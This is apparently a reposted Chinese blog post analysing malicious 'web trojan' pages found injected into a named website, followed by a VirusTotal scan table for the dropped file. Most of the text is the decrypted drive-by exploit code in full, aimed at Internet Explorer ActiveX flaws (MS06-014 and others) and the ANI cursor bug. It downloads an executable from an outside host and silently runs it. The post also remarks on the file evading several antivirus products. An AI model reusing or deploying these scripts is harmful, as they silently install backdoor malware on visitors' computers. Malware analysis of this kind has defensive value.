透彻分析MS06014+MS06073+MS07017智能网马挂马,文章是在breach那看到的,偶有点问题,想不清楚,等学好了再来分析下,文章很不错,看图就能知道!今天逛到http://www.fzlyl.cn/,发现被挂了好几个网马,想通知站长,却找不到联系地址,算了。经过测试发现,原来是MS06-014+MS06-073+MS07017(前段时间最流行的ANI漏洞);
挂了三个所谓的vip的加密网马,解密内容:
1、vip[1].htm
以下是代码片段:
<DIV style="CURSOR: url(ah.c)"></DIV>
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
2、vip1[1].htm
以下是代码片段:
<noscript>
<iframe src=*></iframe>
</noscript>
<script language="JavaScript">
<!--
document.writeln("<script>var ailian,zhan;ailian=\"<http://baobao3.slsbg.com/g.exe\";zhan=\"Microsoft.com\";try{var ado=(document.createElement(\"object\"));var d=1;ado.setAttribute(\"classid\",\"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36\");var e=1;var xml=ado.CreateObject(\"Microsoft.XMLHTTP\",\"\");var f=1;var ln=\"Ado\";var lzn=\"db.St\";var an=\"ream\";var g=1;var as=ado.createobject(ln+lzn+an,\"\");var h=1;xml.Open(\"GET\",ailian,0);xml.Send();as.type=1;var n=1;as.open();as.write(xml.responseBody);as.savetofile(zhan,2);as.close();var shell=ado.createobject(\"Shell.Application\",\"\");shell.Shellexecute(zhan,\"\",\"\",\"open\",0);}catch(e){};</script\>");
//-->
</script>
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
3、vip2[1].htm
以下是代码片段:
<noscript>
<iframe src=*></iframe>
</noscript>
<script>
document.writeln("<script language=\"javaScript\">");
document.writeln("ZhanLang=\"http://baobao3.slsbg.com/g.exe\"");
document.writeln("ZhanLang1=\"Microsoft.com\"");
document.writeln("ZhanLang2=\"Microsoft.vbs\"");
document.writeln("ln=\"BD96C556-65A3-11D0-983A-00C04FC29E36\"");
document.writeln("function Log(QQ7999327)");
document.writeln("{");
document.writeln(" var log=document.createElement(\'p\');");
document.writeln(" log.innerHTML=QQ7999327;");
document.writeln("}");
document.writeln("function CreateO(o,n)");
document.writeln("{");
document.writeln(" var r=null;");
document.writeln(" try");
document.writeln(" {");
document.writeln(" eval(\'r=o.CreateObject(n)\')");
document.writeln(" }");
document.writeln(" catch(e)");
document.writeln(" {}");
document.writeln(" if (!r)");
document.writeln(" {");
document.writeln(" try");
document.writeln(" {");
document.writeln(" eval(\'r=o.CreateObject(n,\"\")\')");
document.writeln(" }");
document.writeln(" catch(e)");
document.writeln(" {}");
document.writeln(" }");
document.writeln(" if(!r)");
document.writeln(" {");
document.writeln(" try");
document.writeln(" {");
document.writeln(" eval(\'r=o.CreateObject(n,\"\",\"\")\')");
document.writeln(" }");
document.writeln(" catch(e)");
document.writeln(" {}");
document.writeln(" }");
document.writeln(" if (!r)");
document.writeln(" {");
document.writeln(" try");
document.writeln(" {");
document.writeln(" eval(\'r=o.GetObject(\"\",n)\')");
document.writeln(" }");
document.writeln(" catch(e)");
document.writeln(" {}");
document.writeln(" }");
document.writeln(" if (!r)");
document.writeln(" {");
document.writeln(" try");
document.writeln(" {");
document.writeln(" eval(\'r=o.GetObject(n,\"\")\')");
document.writeln(" }");
document.writeln(" catch(e)");
document.writeln(" {}");
document.writeln(" }");
document.writeln(" if (!r)");
document.writeln(" {");
document.writeln(" try");
document.writeln(" {");
document.writeln(" eval(\'r=o.GetObject(n)\')");
document.writeln(" }");
document.writeln(" catch(e)");
document.writeln(" {}");
document.writeln(" }");
document.writeln(" return(r);");
document.writeln("}");
document.writeln("function Go(a)");
document.writeln("{");
document.writeln(" Log(\'\');");
document.writeln(" Zhong=\"WScript.S\";");
document.writeln(" ZhongJieZhe=Zhong;");
document.writeln(" var s=CreateO(a,ZhongJieZhe+\"hell\");");
document.writeln(" var o=CreateO(a,\"ADODB.Stream\");");
document.writeln(" var ip=CreateO(a,\"ADODB.Stream\");");
document.writeln(" var e=s.Environment(\"Process\");");
document.writeln(" Log(\'\');");
document.writeln(" var url=ZhanLang;");
document.writeln(" var Lang=e.Item(\"TEMP\")+\"\\\\\"+ZhanLang1;");
document.writeln(" var Zhan=e.Item(\"TEMP\")+\"\\\\\"+ZhanLang2;");
document.writeln(" var vip=null;");
document.writeln(" var kn;");
document.writeln(" kn=\"Set Shell = CreateObject(\\\"Wscript.Shell\\\")\";");
document.writeln(" kn=kn+\"\\n\"+\"Shell.Run(\\\"\"+Lang+\"\\\")\";");
document.writeln(" kn=kn+\"\\n\"+\"set Shell=Nothing\";");
document.writeln(" ip.Mode=3;");
document.writeln(" ip.Open();");
document.writeln(" ip.Charset = \"GB2312\";");
document.writeln(" ip.Position = ip.Size;");
document.writeln(" ip.WriteText=kn;");
document.writeln(" ip.SaveToFile(Zhan,2);");
document.writeln(" try");
document.writeln(" {");
document.writeln(" vip=new XMLHttpRequest();");
document.writeln(" }");
document.writeln(" catch(e)");
document.writeln(" {");
document.writeln(" try");
document.writeln(" {");
document.writeln(" vip=new ActiveXObject(\"Microsoft.XMLHTTP\");");
document.writeln(" }");
document.writeln(" catch(e)");
document.writeln(" {");
document.writeln(" vip=new ActiveXObject(\"MSXML2.ServerXMLHTTP\");");
document.writeln(" }");
document.writeln(" }");
document.writeln(" if (!vip) return(0);");
document.writeln(" Log(\'\');");
document.writeln(" vip.open(\"GET\",url,false);");
document.writeln(" vip.send(null);");
document.writeln(" kn=vip.responseBody;");
document.writeln(" Log(\'\');");
document.writeln(" o.Type=1;");
document.writeln(" o.Mode=3;");
document.writeln(" o.Open();");
document.writeln(" o.Write(kn);");
document.writeln(" o.SaveToFile(Lang,2);");
document.writeln(" Log(\'\');");
document.writeln(" s.Run(Zhan,0);");
document.writeln("}");
document.writeln("function Exploit()");
document.writeln("{");
document.writeln(" var i=0;");
document.writeln(" var tt=new Array(\'{ln}\',\'{BD96C556-65A3-11D0-983A-00C04FC29E36}\',\'{AB9BCEDD-EC7E-47E1-9322-D4A210617116}\',\'{0006F033-0000-0000-C000-000000000046}\',\'{0006F03A-0000-0000-C000-000000000046}\',\'{6e32070a-766d-4ee6-879c-c1fa91d2fc3}\',\'{6414512B-B978-451D-A0D8-FCFDF33E833C}\',\'{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}\',\'{06723E09-F4C2-43c8-8358-09FCD1DB0766}\',\'{639F725F-1B2D-4831-A9FD-874847682010}\',\'{BA018599-1DB3-44f9-83B4-461454C84BF8}\',\'{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}\',\'{E8CCCDDF-CA28-496b-B050-6C07C962476B}\',null);");
document.writeln("while (true)");
document.writeln(" { t=tt
;");
document.writeln(" if (t==null)");
document.writeln(" {");
document.writeln(" return(0);");
document.writeln(" }");
document.writeln(" var a=null;");
document.writeln(" if (t.substring(0,1)==\'{\')");
document.writeln(" {");
document.writeln(" try{");
document.writeln(" a=document.createElement(\"object\");");
document.writeln(" a.setAttribute(\"classid\",\"clsid:\"+t.substring(1,t.length-1));");
document.writeln(" }");
document.writeln(" catch(e)");
document.writeln(" {}");
document.writeln(" }");
document.writeln(" else");
document.writeln(" {");
document.writeln(" try{");
document.writeln(" a=new ActiveXObject(t);");
document.writeln(" }");
document.writeln(" catch(e)");
document.writeln(" {}");
document.writeln(" }");
document.writeln(" if (a)");
document.writeln(" {");
document.writeln(" try");
document.writeln(" {");
document.writeln(" var b=CreateO(a,\"WScript.Shell\");");
document.writeln(" if (b)");
document.writeln(" {");
document.writeln(" Log(\'\');");
document.writeln(" Go(a);");
document.writeln(" return(0);");
document.writeln(" }");
document.writeln(" }");
document.writeln(" catch(e)");
document.writeln(" {}");
document.writeln(" }");
document.writeln(" i++;");
document.writeln(" }");
document.writeln(" Log(\'\');");
document.writeln("}");
document.writeln(" Exploit()");
document.writeln("");
document.writeln("<\/script>");
</script>
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
对所的木马g[1].exe上传到http://www.virustotal.com/en/indexf.html.得到如下:
Antivirus Version Update Result
AhnLab-V3 2007.5.30.0 05.30.2007 Win-Trojan/Hupigon.Gen
AntiVir 7.4.0.29 05.30.2007 HEUR/Malware
Authentium 4.93.8 05.23.2007 could be infected with an unknown virus
Avast 4.7.997.0 05.30.2007 no virus found
AVG 7.5.0.467 05.30.2007 no virus found
BitDefender 7.2 05.31.2007 BehavesLike:Win32.ExplorerHijack
CAT-QuickHeal 9.00 05.30.2007 no virus found
ClamAV devel-20070416 05.30.2007 no virus found
DrWeb 4.33 05.30.2007 DLOADER.Trojan
eSafe 7.0.15.0 05.30.2007 suspicious Trojan/Worm
eTrust-Vet 30.7.3678 05.30.2007 no virus found
Ewido 4.0 05.29.2007 no virus found
FileAdvisor 1 05.31.2007 no virus found
Fortinet 2.85.0.0 05.31.2007 no virus found
F-Prot 4.3.2.48 05.30.2007 no virus found
F-Secure 6.70.13030.0 05.30.2007 no virus found
Ikarus T3.1.1.8 05.30.2007 Trojan.Win32.Delf.vb
Kaspersky 4.0.2.24 05.31.2007 no virus found
McAfee 5042 05.30.2007 no virus found
Microsoft 1.2503 05.31.2007 no virus found
NOD32v2 2299 05.30.2007 probably a variant of Win32/Genetik
Norman 5.80.02 05.30.2007 no virus found
Panda 9.0.0.4 05.30.2007 Suspicious file
Prevx1 V2 05.31.2007 no virus found
Sophos 4.18.0 05.28.2007 no virus found
Sunbelt 2.2.907.0 05.30.2007 no virus found
Symantec 10 05.31.2007 no virus found
TheHacker 6.1.6.126 05.30.2007 no virus found
VBA32 3.12.0 05.30.2007 suspected of Backdoor.GrayBird.1 (paranoid heuristics)
VirusBuster 4.3.23:9 05.30.2007 no virus found
Webwasher-Gateway 6.0.1 05.31.2007 Heuristic.Malware
过Kaspersky、McAfee、AVG等杀毒软件,看来还是做了些免杀动作的。
